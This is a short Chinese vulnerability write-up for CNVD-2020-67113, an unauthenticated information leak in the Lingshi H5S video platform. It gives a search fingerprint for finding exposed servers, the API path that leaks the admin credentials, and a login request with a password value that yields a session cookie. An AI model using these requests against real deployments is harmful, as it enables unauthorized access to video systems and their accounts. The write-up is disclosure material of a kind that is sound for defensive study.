零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 #CNVD-2020-67113

漏洞描述

零视技术(上海)有限公司是以领先的视频技术服务于客户,致力于物联网视频开发简单化,依托于HTML5 WebRTC 等新的技术,实现全平台视频播放简单化。 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口,执行未授权操作。

漏洞影响

零视科技 H5S视频平台

网络测绘

title=”H5S视频平台|WEB”

漏洞复现

登录页面

20240408103350617-png (14)

API文档可以未授权访问

/doc/api.html

20240408104127142-png (15)

存在用户账号密码泄漏的接口

/api/v1/GetUserInfo?user=admin&session=

20240408104334523-1636073746405-1adf993c-1e08-461a-9f7f-a3ab07f969ad.d0b254b2_2024-04-08_10-43-16 (1)

其中登录接口中 Password为接口中存在的账号密码,可以直接发送请求获取Cookie

/api/v1/Login?user=admin&password=02ed400b8d9289f311fc1d68a83fdaaa

20240408104431776-png (16)

请求成功后访问主页面

20240408104550132-1636073852540-6758c6d5-f945-4aec-8c53-53328c3cbc7d.837bdc0e_2024-04-08_10-45-10 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容